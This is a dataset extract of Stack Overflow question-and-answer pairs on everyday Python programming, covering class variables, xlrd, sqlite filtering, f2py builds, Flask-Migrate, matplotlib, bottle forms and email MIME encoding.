text
stringlengths 226
34.5k
|
---|
Python Class Inheritance, __init__ and cls
Question: The desired output of the code is that I have a class variable Team.stuff
which has one entry holding the b instance, and the Player.stuff variable
should be empty. Instead I get an error...
class Player:
stuff=[]
def __init__(self):
cls.stuff.append(self)
class Team(Player):
def __init__(self):
super(Team, self).__init__()
b=Team()
ERROR
cls.stuff.append(self)
NameError: global name 'cls' is not defined
I could pass the cls variable in the `Team.__init__()`, but I'm not sure if
that is the "correct" way, and more importantly the `Player.__init__()` would
need a class variable, and I'm not sure on the syntax on how to do that.
Answer:
class Player(object):
stuff=[]
def __init__(self):
self.stuff.append(self)
class Team(Player):
def __init__(self):
super(Team, self).__init__()
b = Team()
print(Team.stuff)
prints (something like)
[<__main__.Team object at 0xb7519dec>]
|
Extracting values only from the value of excel row recived using xlrd -python
Question: This problem is specific wrt using xlrd package in python I got row of excel
which is in form of list but each item is integer value; type:value this is
not string. The row is save by;
import xlrd
book = xlrd.open_workbook('myfile.xls')
sh = book.sheet_by_index(0)
for rx in range(sh2.nrows):
row = sh.row(rx)
so row saved has value;
row=[text:u'R', text:u'xyz', text:u'Y', text:u'abc', text:u'lmn', empty:'']
This is a list of int. I want the values extracted -
R
xyz
Y
abc
lmn
''
There has to be some method to convert it, but not sure which and how.
Now, I know I can get value just by;
cell_value = sh.cell_value(rowx=rx, colx=1)
but my program requires to collect rows first and then extract values from
save row.
Thanks.
Answer: The row is a sequence of `Cell` instances, which have the attribute `value`.
for cell in row:
cell_value = cell.value
# etc
I am not sure why you want to do it this way - the reference to collecting
rows first seems odd to me, given that you can get the rows directly from the
worksheet.
|
Make Python's Interactive Interpreter Class Print Evaluated Expressions
Question: When you use the Python Interactive Interpreter, you can enter an expression,
say `1+1` and it'll print the value. If you write `1+1` in a script, it will
not print anything, which makes perfect sense.
However, when you create a subclass of `code.InteractiveInterpreter`, then
pass `1+1` into it, using the `runcode` method, it will not print `2`, which
makes less sense.
Does anyone know of a **clean** way to make an `InteractiveInterpreter`
instance print the value of expressions?
Note: This needs to be pretty robust as the application provides a shell to
users, and we all know what they're like.
Cheers
_P.S. This is for a Python3 application, but a better Python2 solution will
get the check._
Answer: Isn't that what
[`code.InteractiveConsole`](http://docs.python.org/3.3/library/code.html#interactive-
console-objects) is for?
>>> import code
>>> console = code.InteractiveConsole()
>>> r = console.push('1+1')
2
>>> r = console.push('x = 4 + 1')
>>> r = console.push('x + 10')
15
>>> r = console.push('def test(n):')
>>> r = console.push(' return n + 5')
>>> r = console.push('')
>>> r = console.push('test(10)')
15
Or with embedded newlines:
>>> r = console.push('def test2(n):\n return n+10\n')
>>> r = console.push('test2(10)')
20
>>>
# the following, however, fails...
>>> r = console.push('test(10)\ntest(15)')
File "<console>", line 1
test(10)
^
SyntaxError: multiple statements found while compiling a single statement
>>>
|
sqlite and python filter results
Question: I have a python function to do query from sqlite. as the following:
def Query(X, Y, Z):
where X, Y & Z are the columns of the database. so for example when
Query(1, 2, 3)
it will go to the sqlite as follows:
<code>SELECT OUTPUT FROM IMAGES WHERE (X=?) AND (Y=?) AND (Z=?)",[X,Y,Y]</code>
So, it will take numbers 1,2 & 3 and will fetch them from sqlite. The problem
I have when the input of:
Query(X, Y, Z)
has one or more empty fields, as example:
Query(1, 2, '')
in this case I want the database to ignore column Z, but I can not figure out
how to do it. I have tried
SELECT OUTPUT FROM IMAGES WHERE (X=? OR X) AND (Y=? OR Y) AND (Z=? OR Z)",[X,Y,Z]
but this statement is not working well.
Could someone help, how to ignore a column if the input from Python is empty.
Answer: There could be something wrong with the testing of an empty string. You could
try something similar to the following:
"SELECT OUTPUT FROM IMAGES WHERE (X=? OR ?='') AND (Y=? OR ?='') AND (Z=? OR ?='')",[X,Y,Z]
But admittedly it is more like a hint than an actual verified solution.
**Edit**
Probably you need named parameters:
def Query(X, Y, Z):
import sqlite3
conn = sqlite3.connect('example.db')
c = conn.cursor()
c.execute("SELECT OUTPUT FROM IMAGES WHERE (X=:px OR :px='') AND (Y=:py OR :py='') AND (Z=:pz OR :pz='')", {"px": X, "py": Y, "pz": Z})
**Edit**
Try this [sqlfiddle](http://sqlfiddle.com/#!7/1a462/1).
**Edit**
Consider the following fragment of your query:
(Y=? OR Y)
For a database row for which Y='foo', it is equivalent to:
('foo'=? OR 'foo')
Since 'foo' converts to false, that is equivalent to:
('foo'=? OR false)
Which is equivalent to:
('foo'=?)
Which can be true only if you queried for Y='foo'. If instead you queried
Y='', you get:
('foo'='')
Which is obviously false.
Hence your query is really behaving like the original one, the one without
ORs.
|
python unittest.TestCase.assertEquals() on complex data structures
Question: I'm unit testing a function that returns a _very_ complex data structure (dict
of lists of lists of sets etc.). I validated the output manually, and now I
want to make sure it doesn't change without me noticing.
Right now I have:
self.assertEquals(data,
{'Instr1': {'COUPON_LIST': '0 % SEMI 30/360',
'LEGAL_ENTITY': 'LE_XS0181523803',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
'THEO/PV01': -1500.15,
'THEO/Value': 0.333,
'THEO/Yield': 3.3/100},
'UP': {'Spread Over Yield': -2.2/100,
'THEO/PV01': -1000.1,
'THEO/Value': 0.111,
'THEO/Yield': 5.5/100}}},
'Instr2': {'COUPON_LIST': None,
'LEGAL_ENTITY': 'LE_US059512AJ22',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': None,
'THEO/PV01': None,
'THEO/Value': 1.0,
'THEO/Yield': 0.0},
'UP': {'Spread Over Yield': None,
'THEO/PV01': -15.15,
'THEO/Value': 4055.344,
'THEO/Yield': 4.4/100}}},
'Instr3': {'COUPON_LIST': '0 % SEMI 30/360',
'LEGAL_ENTITY': 'LE_XS0181523803',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
'THEO/PV01': -1500.15,
'THEO/Value': 0.333,
'THEO/Yield': 3.3/100},
'UP': {'Spread Over Yield': -2.2/100,
'THEO/PV01': -1000.1,
'THEO/Value': 0.111,
'THEO/Yield': 5.5/100}}},
'Instr4': {'COUPON_LIST': None,
'LEGAL_ENTITY': 'LE_US059512AJ22',
'MATURITY_DATE': '2014/12/31',
'scenarios': {'Base': {'Spread Over Yield': None,
'THEO/PV01': None,
'THEO/Value': 1.0,
'THEO/Yield': 0.0},
'UP': {'Spread Over Yield': None,
'THEO/PV01': -15.15,
'THEO/Value': 4055.344,
'THEO/Yield': 4.4/100}}}}
I have two problems:
1. the tested class is not stable and the data CAN change. In that case, I want to quickly pinpoint where the output changed, and only validate the differences. E.g. I'm looking for a nice output saying
data['Instr1']['MATURITY_DATE']: '2014/12/31' != '31/12/2014'
data['Instr5']: node not found in lhs
but at the same time I do not want to manually test every single node of the
structure.
2. as you can see some elements are float, and 4.4/100 != 0.044. I need logic that runs AssertAlmostEqual on float nodes, and AssertEqual on everything else.
Is there any library that does this, or do I have to write my own?
Answer: A _quick and dirty_ solution is to compare the pretty-print representations of
the data using `difflib`. However this solution is absolutely _not_ robust:
In [22]: import copy
...: import difflib
...: import pprint
...:
In [23]: data = {'Instr1': {'COUPON_LIST': '0 % SEMI 30/360',
...: 'LEGAL_ENTITY': 'LE_XS0181523803',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
...: 'THEO/PV01': -1500.15,
...: 'THEO/Value': 0.333,
...: 'THEO/Yield': 3.3/100},
...: 'UP': {'Spread Over Yield': -2.2/100,
...: 'THEO/PV01': -1000.1,
...: 'THEO/Value': 0.111,
...: 'THEO/Yield': 5.5/100}}},
...: 'Instr2': {'COUPON_LIST': None,
...: 'LEGAL_ENTITY': 'LE_US059512AJ22',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': None,
...: 'THEO/PV01': None,
...: 'THEO/Value': 1.0,
...: 'THEO/Yield': 0.0},
...: 'UP': {'Spread Over Yield': None,
...: 'THEO/PV01': -15.15,
...: 'THEO/Value': 4055.344,
...: 'THEO/Yield': 4.4/100}}},
...: 'Instr3': {'COUPON_LIST': '0 % SEMI 30/360',
...: 'LEGAL_ENTITY': 'LE_XS0181523803',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': -1.9/100,
...: 'THEO/PV01': -1500.15,
...: 'THEO/Value': 0.333,
...: 'THEO/Yield': 3.3/100},
...: 'UP': {'Spread Over Yield': -2.2/100,
...: 'THEO/PV01': -1000.1,
...: 'THEO/Value': 0.111,
...: 'THEO/Yield': 5.5/100}}},
...: 'Instr4': {'COUPON_LIST': None,
...: 'LEGAL_ENTITY': 'LE_US059512AJ22',
...: 'MATURITY_DATE': '2014/12/31',
...: 'scenarios': {'Base': {'Spread Over Yield': None,
...: 'THEO/PV01': None,
...: 'THEO/Value': 1.0,
...: 'THEO/Yield': 0.0},
...: 'UP': {'Spread Over Yield': None,
...: 'THEO/PV01': -15.15,
...: 'THEO/Value': 4055.344,
...: 'THEO/Yield': 4.4/100}}}}
In [24]: data_repr = pprint.pformat(data)
In [25]: data2 = copy.deepcopy(data)
In [26]: data2['Instr1']['MATURITY_DATE'] = '31/12/2014'
In [27]: data2_repr = pprint.pformat(data2)
In [28]: def get_diff(a, b):
...: differ = difflib.unified_diff(a.splitlines(True), b.splitlines(True))
...: return ''.join(line for line in differ if not line.startswith(' '))
In [29]: print(get_diff(data_repr, data2_repr))
---
+++
@@ -1,6 +1,6 @@
- 'MATURITY_DATE': '2014/12/31',
+ 'MATURITY_DATE': '31/12/2014',
However this doesn't solve the problem with floating point numbers. You could
solve this by first replacing `float`ing points values with `round`ed values
to some significant digit, using a simple recursive function.
As far as I know there is no such library that allows this level of fine
control over comparisons, so if you want a robust solution you'd better write
the whole code yourself.
I'd also point out that maybe you should refactor this data structure into a
more structured class, which would make things easier.
Last but not least: you can use `unittest`'s
[`addTypeEqualityFunc`](http://docs.python.org/3.3/library/unittest.html#unittest.TestCase.addTypeEqualityFunc)
to make sure the `TestCase` calls `assertAlmostEqual` when comparing `float`s,
without doing it by hand.
* * *
Now that I think about it you may be able to use `addTypeEqualityFunc` to
perform a custom comparison of `dict`s which could add more information on the
mismatch. To find _all_ mismatches You'd have to use some `except
AssertionError as e:` blocks into your custom function, always check all sub-
elements and then "join" the error messages somehow. But I don't think the
solution would be so clean.
|
log a variable name and value
Question: I am looking for a way to quickly print a variable name and value while
rapidly developing/debugging a small python script on a unix command line/ssh
session.
It seems like a very common requirement and it seems wasteful (on keystrokes
and time/energy) to duplicate the variable_names on every line which prints or
logs its value. i.e. rather than
print 'my_variable_name:', my_variable_name
I want to be able to do the following for str, int, list, dict
log(my_variable_name)
log(i)
log(my_string)
log(my_list)
and get the following output
my_variable_name:some string
i:10
my_string:a string of words
my_list:[1, 2, 3]
ideally the output would also log the function name
I have seen some solutions attempting to use locals, globals, frames etc., But
I have not yet seen something that works for ints, strings, lists, and works
inside functions too.
Thanks
Answer: If the tool you need is only for developing and debugging, there's a useful
package calle [q](https://github.com/zestyping/q).
It has been submitted to pypi, it can be installed with `pip install q` or
`easy_install q`.
import q; q(foo)
# use @q to trace a function's arguments and return value
@q
def bar():
...
# to start an interactive console at any point in your code:
q.d()
The results are output to the file /tmp/q(or any customized paths) by
default,so they won't be mixed with stdout and normal logs. You can check the
output with `tail -f /tmp/q`. The output is highlighted with different colors.
The author introduced his library in a lightning talk of PyconUS 2013. The
video is
[here](http://www.youtube.com/watch?feature=player_embedded&v=OL3De8BAhME),
begins at 25:15.
|
How do you convert a python time.struct_time object into a ISO string?
Question: I have a Python object:
time.struct_time(tm_year=2013, tm_mon=10, tm_mday=11, tm_hour=11, tm_min=57, tm_sec=12, tm_wday=4, tm_yday=284, tm_isdst=0)
And I need to get an [ISO string](http://www.w3.org/TR/NOTE-datetime):
'2013-10-11T11:57:12Z'
How can I do that?
Answer: Using
[`time.strftime()`](http://docs.python.org/2/library/time.html#time.strftime)
is perhaps easiest:
iso = time.strftime('%Y-%m-%dT%H:%M:%SZ', timetup)
Demo:
>>> import time
>>> timetup = time.gmtime()
>>> time.strftime('%Y-%m-%dT%H:%M:%SZ', timetup)
'2013-10-11T13:31:03Z'
You can also use a `datetime.datetime()` object, which has a
[`datetime.isoformat()`](http://docs.python.org/2/library/datetime.html#datetime.datetime.isoformat)
method:
>>> from datetime import datetime
>>> datetime(*timetup[:6]).isoformat()
'2013-10-11T13:31:03'
This misses the timezone `Z` marker; you could just add that.
|
f2py with Intel Fortran compiler
Question: I am trying to use f2py to interface my python programs with my Fortran
modules.
I am on a Win7 platform.
I use latest Anaconda 64 (1.7) as a Python+NumPy stack.
My Fortran compiler is the latest Intel Fortran compiler 64 (version
14.0.0.103 Build 20130728).
I have been experiencing a number of issues when executing `f2py -c -m
PyModule FortranModule.f90 --fcompiler=intelvem`
The last one, which I can't seem to sort out is that it looks like the
sequence of flags f2py/distutils passes to the compiler does not match what
ifort expects.
I get a series of warning messages regarding unknown options when ifort is
invoked.
ifort: command line warning #10006: ignoring unknown option '/LC:\Anaconda\libs'
ifort: command line warning #10006: ignoring unknown option'/LC:\Anaconda\PCbuild\amd64'
ifort: command line warning #10006: ignoring unknown option '/lpython27'
I suspect this is related to the errors I get from the linker at the end
error LNK2019: unresolved external symbol __imp_PyImport_ImportModule referenced in function _import_array
error LNK2019... and so forth (there are about 30-40 lines like that, with different python modules missing)
and it concludes with a plain
fatal error LNK1120: 42 unresolved externals
My guess is that this is because the /link flag is missing in the sequence of
options. Because of this, the /l /L options are not passed to the linker and
the compiler believes these are addressed to him.
The ifort command generated by f2py looks like this:
ifort.exe -dll -dll Pymodule.o fortranobject.o FortranModule.o module-f2pywrappers2.o -LC:\Anaconda\libs -LC:\Anaconda\PCbuild\amd64 -lPython27
I have no idea why the "-dll" is repeated twice (I had to change that flag
from an original "-shared").
Now, I have tried to look into the f2py and distutils codes but haven't
figured out how to bodge an additional /link in the command output. I haven't
even been able to locate where this output is generated.
If anyone has encountered this problem in the past and/or may have some
suggestions, I would very much appreciate it.
Thank you for your time
Answer: I encountered similar problems with my own code some time ago. If I understand
the comments correctly you already used the approach that worked for me, so
this is just meant as clarification and summary for all those that struggle
with f2py and dependencies:
f2py seems to have problems resolving dependecies on external source files. If
the external dependencies get passed to f2py as already compiled object files
though, the linking works fine and the python library gets build without
problems.
The easiest solution therefore seems to be:
1. compile all dependencies to object files (*.o) using your prefered compiler and compiler settings
2. pass all object files to f2py, together with the **source file** of your main subroutine/ function/ module/ ...
3. use generated python library as expected
A simple python skript could look like this (pycompile.py):
#!python.exe
# -*- coding: UTF-8 -*-
import os
import platform
'''Uses f2py to compile needed library'''
# build command-strings
# command for compling *.o and *.mod files
fortran_exe = "gfortran "
# fortran compiler settings
fortran_flags = "<some_gfortran_flags> "
# add path to source code
fortran_source = ("./relative/path/to/source_1.f90 "
"C:/absolut/path/to/source_2.f90 "
"...")
# assemble fortran command
fortran_cmd = fortran_exe + fortran_flags + fortran_source
# command for compiling main source file using f2py
f2py_exe = "f2py -c "
# special compiler-options for Linux/ Windows
if (platform.system() == 'Linux'):
f2py_flags = "--compiler=unix --fcompiler=gnu95 "
elif (platform.system() == 'Windows'):
f2py_flags = "--compiler=mingw32 --fcompiler=gnu95 "
# add path to source code/ dependencies
f2py_source = ("-m for_to_py_lib "
"./path/to/main_source.f90 "
"source_1.o "
"source_2.o "
"... "
)
# assemble f2py command
f2py_cmd = f2py_exe + f2py_flags + f2py_source
# compile .o and .mod files
print "compiling object- and module-files..."
print
print fortran_cmd
os.system(fortran_cmd)
# compile main_source.f90 with f2py
print "================================================================"
print "start f2py..."
print
print f2py_cmd
os.system(f2py_cmd)
* * *
A more flexible solution for large projects could be provided via Makefile, as
dicussed by [@bdforbes](https://stackoverflow.com/users/336001/bdforbes) in
the comments ([for reference](http://pastebin.com/ChSxLzSb)) or a custom CMake
User Command in combination with the above skript:
###############################################################################
# General project properties
################################################################################
# Set Project Name
project (for_to_py_lib)
# Set Version Number
set (for_to_py_lib_VERSION_MAJOR 1)
set (for_to_py_lib_VERSION_MINOR 0)
# save folder locations for later use/ scripting (see pycompile.py)
# relative to SOURCE folder
set(source_root ${CMAKE_CURRENT_LIST_DIR}/SOURCE) # save top level source dir for later use
set(lib_root ${CMAKE_CURRENT_LIST_DIR}/LIBRARIES) # save top level lib dir for later use
# relative to BUILD folder
set(build_root ${CMAKE_CURRENT_BINARY_DIR}) # save top level build dir for later use
###
### Fortran to Python library
###
find_package(PythonInterp)
if (PYTHONINTERP_FOUND)
# copy python compile skript file to build folder and substitute CMake variables
configure_file(${source_root}/pycompile.py ${build_root}/pycompile.py @ONLY)
# define for_to_py library ending
if (UNIX)
set(CMAKE_PYTHON_LIBRARY_SUFFIX .so)
elseif (WIN32)
set(CMAKE_PYTHON_LIBRARY_SUFFIX .pyd)
endif()
# add custom target to ALL, building the for_to_py python library (using f2py)
add_custom_target(for_to_py ALL
DEPENDS ${build_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX})
# build command for python library (execute python script pycompile.py containing the actual build commands)
add_custom_command(OUTPUT ${build_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX}
COMMAND ${PYTHON_EXECUTABLE} ${build_root}/pycompile.py
WORKING_DIRECTORY ${build_root}
DEPENDS ${build_root}/pycompile.py
${source_root}/path/to/source_1.f90
${source_root}/path/to/source_2.f90
${source_root}/INOUT/s4binout.f90
COMMENT "Generating fortran to python library")
# post build command for python library (copying of generated files)
add_custom_command(TARGET for_to_py
POST_BUILD
COMMAND ${CMAKE_COMMAND} -E copy_if_different
${build_root}/s4_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX}
${lib_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX}
COMMENT "\
***************************************************************************************************\n\
copy of python library for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX} placed in ${lib_root}/for_to_py${CMAKE_PYTHON_LIBRARY_SUFFIX} \n\
***************************************************************************************************"
)
endif (PYTHONINTERP_FOUND)
with modified pycompile:
#!python.exe
# -*- coding: UTF-8 -*-
...
fortran_source = ("@source_root@/source_1.f90 "
"@source_root@/source_2.f90 "
"...")
...
# add path to source code/ dependencies
f2py_source = ("-m for_to_py_lib "
"@build_root@/for_to_py.f90 "
"source_1.o "
"source_2.o "
"... "
)
...
# compile .o and .mod files
...
|
Flask-Migrate not creating tables
Question: I have the following models in file `listpull/models.py`:
from datetime import datetime
from listpull import db
class Job(db.Model):
id = db.Column(db.Integer, primary_key=True)
list_type_id = db.Column(db.Integer, db.ForeignKey('list_type.id'),
nullable=False)
list_type = db.relationship('ListType',
backref=db.backref('jobs', lazy='dynamic'))
record_count = db.Column(db.Integer, nullable=False)
status = db.Column(db.Integer, nullable=False)
sf_job_id = db.Column(db.Integer, nullable=False)
created_at = db.Column(db.DateTime, nullable=False)
compressed_csv = db.Column(db.LargeBinary)
def __init__(self, list_type, created_at=None):
self.list_type = list_type
if created_at is None:
created_at = datetime.utcnow()
self.created_at = created_at
def __repr__(self):
return '<Job {}>'.format(self.id)
class ListType(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
def __init__(self, name):
self.name = name
def __repr__(self):
return '<ListType {}>'.format(self.name)
I call `./run.py init` then `./run.py migrate` then `./run.py upgrade`, and I
see the migration file generated, but its empty:
"""empty message
Revision ID: 5048d48b21de
Revises: None
Create Date: 2013-10-11 13:25:43.131937
"""
# revision identifiers, used by Alembic.
revision = '5048d48b21de'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
**run.py**
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from listpull import manager
manager.run()
**listpull/__init__.py**
# -*- coding: utf-8 -*-
# pylint: disable-msg=C0103
""" listpull module """
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.script import Manager
from flask.ext.migrate import Migrate, MigrateCommand
from mom.client import SQLClient
from smartfocus.restclient import RESTClient
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
mom = SQLClient(app.config['MOM_HOST'],
app.config['MOM_USER'],
app.config['MOM_PASSWORD'],
app.config['MOM_DB'])
sf = RESTClient(app.config['SMARTFOCUS_URL'],
app.config['SMARTFOCUS_LOGIN'],
app.config['SMARTFOCUS_PASSWORD'],
app.config['SMARTFOCUS_KEY'])
import listpull.models
import listpull.views
**UPDATE**
If I run the shell via `./run.py shell` and then do `from listpull import *`
and call `db.create_all()`, I get the schema:
mark.richman@MBP:~/code/nhs-listpull$ sqlite3 app.db
-- Loading resources from /Users/mark.richman/.sqliterc
SQLite version 3.7.12 2012-04-03 19:43:07
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .schema
CREATE TABLE job (
id INTEGER NOT NULL,
list_type_id INTEGER NOT NULL,
record_count INTEGER NOT NULL,
status INTEGER NOT NULL,
sf_job_id INTEGER NOT NULL,
created_at DATETIME NOT NULL,
compressed_csv BLOB,
PRIMARY KEY (id),
FOREIGN KEY(list_type_id) REFERENCES list_type (id)
);
CREATE TABLE list_type (
id INTEGER NOT NULL,
name VARCHAR(80) NOT NULL,
PRIMARY KEY (id),
UNIQUE (name)
);
sqlite>
Unfortunately, the migrations still do not work.
Answer: When you call the `migrate` command Flask-Migrate (or actually Alembic
underneath it) will look at your `models.py` and compare that to what's
actually in your database.
The fact that you've got an empty migration script suggests you have updated
your database to match your model through another method that is outside of
Flask-Migrate's control, maybe by calling Flask-SQLAlchemy's
`db.create_all()`.
If you don't have any valuable data in your database, then open a Python shell
and call `db.drop_all()` to empty it, then try the auto migration again.
**UPDATE** : I installed your project here and confirmed that migrations are
working fine for me:
(venv)[miguel@miguel-linux nhs-listpull]$ ./run.py db init
Creating directory /home/miguel/tmp/mark/nhs-listpull/migrations...done
Creating directory /home/miguel/tmp/mark/nhs-listpull/migrations/versions...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/script.py.mako...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/env.pyc...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/env.py...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/README...done
Generating /home/miguel/tmp/mark/nhs-listpull/migrations/alembic.ini...done
Please edit configuration/connection/logging settings in
'/home/miguel/tmp/mark/nhs-listpull/migrations/alembic.ini' before
proceeding.
(venv)[miguel@miguel-linux nhs-listpull]$ ./run.py db migrate
INFO [alembic.migration] Context impl SQLiteImpl.
INFO [alembic.migration] Will assume non-transactional DDL.
INFO [alembic.autogenerate] Detected added table 'list_type'
INFO [alembic.autogenerate] Detected added table 'job'
Generating /home/miguel/tmp/mark/nhs-
listpull/migrations/versions/48ff3456cfd3_.py...done
Try a fresh checkout, I think your setup is correct.
|
Printing a Yearly Calendar
Question: I am trying to print a yearly calendar with python and I have hit a wall. I am
getting the days of the month printed, but I am not sure how to make the
output jump to a new line after 7 days.
I am using a for loop to print the days of the month.
I need the numbers to go to a new line in order for the days of the week and
numbers to line up. Any advice would help.
Answer: Is there a reason you aren't using the built-in
[calendar](http://docs.python.org/2/library/calendar.html) module?
>>> import calendar
>>> cal = calendar.TextCalendar()
>>> cal.prmonth(2013, 5)
May 2013
Mo Tu We Th Fr Sa Su
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
>>> cal.pryear(2013)
2013
January February March
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 1 2 3 1 2 3
7 8 9 10 11 12 13 4 5 6 7 8 9 10 4 5 6 7 8 9 10
14 15 16 17 18 19 20 11 12 13 14 15 16 17 11 12 13 14 15 16 17
21 22 23 24 25 26 27 18 19 20 21 22 23 24 18 19 20 21 22 23 24
28 29 30 31 25 26 27 28 25 26 27 28 29 30 31
April May June
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 7 1 2 3 4 5 1 2
8 9 10 11 12 13 14 6 7 8 9 10 11 12 3 4 5 6 7 8 9
15 16 17 18 19 20 21 13 14 15 16 17 18 19 10 11 12 13 14 15 16
22 23 24 25 26 27 28 20 21 22 23 24 25 26 17 18 19 20 21 22 23
29 30 27 28 29 30 31 24 25 26 27 28 29 30
July August September
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 7 1 2 3 4 1
8 9 10 11 12 13 14 5 6 7 8 9 10 11 2 3 4 5 6 7 8
15 16 17 18 19 20 21 12 13 14 15 16 17 18 9 10 11 12 13 14 15
22 23 24 25 26 27 28 19 20 21 22 23 24 25 16 17 18 19 20 21 22
29 30 31 26 27 28 29 30 31 23 24 25 26 27 28 29
30
October November December
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 5 6 1 2 3 1
7 8 9 10 11 12 13 4 5 6 7 8 9 10 2 3 4 5 6 7 8
14 15 16 17 18 19 20 11 12 13 14 15 16 17 9 10 11 12 13 14 15
21 22 23 24 25 26 27 18 19 20 21 22 23 24 16 17 18 19 20 21 22
28 29 30 31 25 26 27 28 29 30 23 24 25 26 27 28 29
30 31
|
matplotlib savefig bbox_inches = 'tight' does not ignore invisible axes
Question: When you set bbox_inches = 'tight' in Matplotlib's savefig() function, it
tries to find the tightest bounding box that encapsulates all the content in
your figure window. Unfortunately, the tightest bounding box appears to
include invisible axes.
For example, here is a snippet where setting bbox_inches = 'tight' works as
desired:
import matplotlib.pylab as plt
fig = plt.figure(figsize = (5,5))
data_ax = fig.add_axes([0.2, 0.2, 0.6, 0.6])
data_ax.plot([1,2], [1,2])
plt.savefig('Test1.pdf', bbox_inches = 'tight', pad_inches = 0)
which produces:

The bounds of the saved pdf correspond to the bounds of the content. This is
great, except that I like to use a set of invisible figure axes to place
annotations in. If the invisible axes extend beyond the bounds of the visible
content, then the pdf bounds are larger than the visible content. For example:
import matplotlib.pylab as plt
fig = plt.figure(figsize = (5,5))
fig_ax = fig.add_axes([0, 0, 1, 1], frame_on = False)
fig_ax.xaxis.set_visible(False)
fig_ax.yaxis.set_visible(False)
data_ax = fig.add_axes([0.2, 0.2, 0.6, 0.6])
data_ax.plot([1,2], [1,2])
plt.savefig('Test2.pdf', bbox_inches = 'tight', pad_inches = 0)
producing

How can I force savefig() to ignore invisible items in the figure window? The
only solution I have come up with is to calculate the bounding box myself and
explicitly specify the bbox to savefig().
In case it matters, I am running Matplotlib 1.2.1 under Python 2.7.3 on Mac OS
X 10.8.5.
Answer: The relevant function (called by `canvas.print_figure` which is called by
`figure.savefig` to generate the bounding box) in `backend_bases.py`:
def get_tightbbox(self, renderer):
"""
Return a (tight) bounding box of the figure in inches.
It only accounts axes title, axis labels, and axis
ticklabels. Needs improvement.
"""
bb = []
for ax in self.axes:
if ax.get_visible():
bb.append(ax.get_tightbbox(renderer))
_bbox = Bbox.union([b for b in bb if b.width != 0 or b.height != 0])
bbox_inches = TransformedBbox(_bbox,
Affine2D().scale(1. / self.dpi))
return bbox_inches
The only consideration that goes into deciding if an axes is 'visible' is if
`ax.get_visible()` returns true, even if you have no visible (either
`artist.get_visible() == False` or simple transparent) artists in the axes.
The bounding box behavior you observe is the correct behavior.
|
html post values addition in bottle application
Question: I was trying to add two html form values transferred via post in a python
bottle application. Unfortunately it is just concatenating. I tried to convert
the inputs to int but then i get" Unhandled Exception Error".... This is my
code
from bottle import get, post, request,default_app # or route
import math
@get('/login') # or @route('/login')
def login():
return '''
<form action="/login" method="post">
Number1: <input name="num1" type="number" />
Number2: <input name="num2" type="number" />
<input value="Add" type="submit" />
</form>
'''
@post('/login') # or @route('/login', method='POST')
def do_login():
num1 = request.forms.get('num1')
num2 = request.forms.get('num2')
return num1+num2
import os
from bottle import TEMPLATE_PATH
TEMPLATE_PATH.append(os.path.join(os.environ['OPENSHIFT_HOMEDIR'],
'runtime/repo/wsgi/views/'))
application=default_app()
If i type return (int)num1+(int)num2 unhandled exception error results.. Dont
know why.. Same is for type(),float() functions as well.
Answer: I think you just have to convert the return value to str, so try:
`return str(int(num1) + int(num2))`
|
How do I change my Content-Transfer-Encoding header in Python?
Question: This is my code right now:
from email.MIMEText import MIMEText
body = "helloworld"
msg = MIMEText(body, 'plain')
msg['Subject']= subject
msg['From'] = from_field['name'] + ' <'+from_field['email']+'>'
msg['Date'] = datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')
#other code here for connecting to SMTP
conn.sendmail(from_field['email'],[to_email], msg.as_string()) #finally send the email
My current code produces the following headers:
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"
However, I want my code to produce the following:
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=iso-8859-1
How can I modify my MIMEText to do this?
Answer: Specifying `_charset` changes the `Content-Transfer-Encoding` and `Content-
Type`
>>> import datetime
>>> from email.MIMEText import MIMEText
>>> body = "helloworld"
>>> msg = MIMEText(body, 'plain', _charset='iso-8859-1')
>>> msg['Subject'] = 'asdf'
>>> msg['From'] = 'name <[email protected]>'
>>> msg['Date'] = datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S %z')
>>> print msg
From nobody Sun Oct 13 06:22:32 2013
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Subject: asdf
